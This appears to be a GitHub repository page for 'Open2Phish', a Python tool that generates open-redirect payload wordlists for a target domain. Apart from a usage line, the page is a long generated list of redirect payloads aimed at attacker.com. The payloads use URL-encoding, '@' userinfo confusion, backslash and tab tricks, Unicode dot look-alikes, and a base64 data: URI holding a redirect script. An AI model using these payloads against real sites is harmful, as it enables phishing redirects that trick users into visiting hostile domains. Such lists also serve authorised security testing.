/Open2Phish

Open redirect payloads wordlist generator

Primary LanguagePython

Open2Phish

Open redirect payloads wordlist generator.

Usage

usage: python3 open2phish.py -t target.com -d attacker.com

Output

Output in terminal and in txt file:

http://attacker.com
https://attacker.com
attacker.com
.attacker.com
//attacker.com
///attacker.com/%2F
////attacker.com/%2F
https://attacker.com/target.com
https://target.com.attacker.com/target.com
https://target.com@attacker.com/target.com
https:attacker.com
https;attacker.com
https:/\/\attacker.com
https:\/\/attacker.com
https:\attacker.com
https://target.com\@attacker.com
//attacker,com
data:text/html;base64,PHNjcmlwdD5sb2NhdGlvbj0iaHR0cHM6Ly9hdHRhY2tlci5jb20iPC9zY3JpcHQ+
https://target.com%2f@attacker.com
https://target.com%252f@attacker.com
https://target.com%25252f@attacker.com
https://target.com%252f@attacker.com
https://attacker.com%fftarget.com
https://attacker.com?.target.com
https://attacker%e3%80%82com
https://attacker。com
https://attacker%02com
%2f%2fattacker%25e3%2580%2582com
//.@.@attacker.com
//target.com@attacker.com/%2f..
///attacker.com/%2f..
///target.com@attacker.com/%2f..
////attacker.com/%2f..
////target.com@attacker.com/%2f..
https://attacker.com/%2f..
https://target.com@attacker.com/%2f..
/https://attacker.com/%2f..
/https://target.com@attacker.com/%2f..
//attacker.com/%2f%2e%2e
//target.com@attacker.com/%2f%2e%2e
///attacker.com/%2f%2e%2e
///target.com@attacker.com/%2f%2e%2e
////attacker.com/%2f%2e%2e
////target.com@attacker.com/%2f%2e%2e
https://attacker.com/%2f%2e%2e
https://target.com@attacker.com/%2f%2e%2e
/https://attacker.com/%2f%2e%2e
/https://target.com@attacker.com/%2f%2e%2e
//attacker.com/
//target.com@attacker.com/
///attacker.com/
///target.com@attacker.com/
////attacker.com/
////target.com@attacker.com/
https://attacker.com/
https://target.com@attacker.com/
/https://attacker.com/
/https://target.com@attacker.com/
//attacker.com//
//target.com@attacker.com//
///attacker.com//
///target.com@attacker.com//
////attacker.com//
////target.com@attacker.com//
https://attacker.com//
https://target.com@attacker.com//
//https://attacker.com//
//https://target.com@attacker.com//
//attacker.com/%2e%2e%2f
//target.com@attacker.com/%2e%2e%2f
///attacker.com/%2e%2e%2f
///target.com@attacker.com/%2e%2e%2f
////attacker.com/%2e%2e%2f
////target.com@attacker.com/%2e%2e%2f
https://attacker.com/%2e%2e%2f
https://target.com@attacker.com/%2e%2e%2f
//https://attacker.com/%2e%2e%2f
//https://target.com@attacker.com/%2e%2e%2f
///attacker.com/%2e%2e
///target.com@attacker.com/%2e%2e
////attacker.com/%2e%2e
////target.com@attacker.com/%2e%2e
https:///attacker.com/%2e%2e
https:///target.com@attacker.com/%2e%2e
//https:///attacker.com/%2e%2e
//target.com@https:///attacker.com/%2e%2e
/https://attacker.com/%2e%2e
/https://target.com@attacker.com/%2e%2e
///attacker.com/%2f%2e%2e
///target.com@attacker.com/%2f%2e%2e
////attacker.com/%2f%2e%2e
////target.com@attacker.com/%2f%2e%2e
https:///attacker.com/%2f%2e%2e
https:///target.com@attacker.com/%2f%2e%2e
/https://attacker.com/%2f%2e%2e
/https://target.com@attacker.com/%2f%2e%2e
/https:///attacker.com/%2f%2e%2e
/https:///target.com@attacker.com/%2f%2e%2e
/%09/attacker.com
/%09/target.com@attacker.com
//%09/attacker.com
//%09/target.com@attacker.com
///%09/attacker.com
///%09/target.com@attacker.com
////%09/attacker.com
////%09/target.com@attacker.com
https://%09/attacker.com
https://%09/target.com@attacker.com
/%5cattacker.com
/%5ctarget.com@attacker.com
//%5cattacker.com
//%5ctarget.com@attacker.com
///%5cattacker.com
///%5ctarget.com@attacker.com
////%5cattacker.com
////%5ctarget.com@attacker.com
https://%5cattacker.com
https://%5ctarget.com@attacker.com
/https://%5cattacker.com
/https://%5ctarget.com@attacker.com
https://target.com@attacker.com
//attacker%E3%80%82com
\/\/attacker.com/
/\/attacker.com/
//attacker%00.com
https://target.com/https://attacker.com/
〱attacker.com
〵attacker.com
ゝattacker.com
ーattacker.com
ーattacker.com
/〱attacker.com
/〵attacker.com
/ゝattacker.com
/ーattacker.com
/ーattacker.com
<>//attacker.com
//attacker.com\@target.com
https://:@attacker.com\@target.com
http://attacker.com:80#@target.com/
http://attacker.com:80?@target.com/
http://target.com+&@attacker.com#+@target.com/
http://attacker.com%0Dtarget.com/
//attacker.com:80#@target.com/
//attacker.com:80?@target.com/
//target.com+&@attacker.com#+@target.com/
//attacker.com%0Dtarget.com/
//;@attacker.com
http://;@attacker.com
http://attacker.com%2f%2f.target.com/
http://attacker.com%5c%5c.target.com/
http://attacker.com%3F.target.com/
http://attacker.com%23.target.com/
http://target.com:80%40attacker.com/
http://target.com%2eattacker.com/
/https:/%5cattacker.com/
/http://attacker.com
/%2f%2fattacker.com
/attacker.com/%2f%2e%2e
/http:/attacker.com
/http:attacker.com
/.attacker.com
///\;@attacker.com
/////attacker.com/
/////attacker.com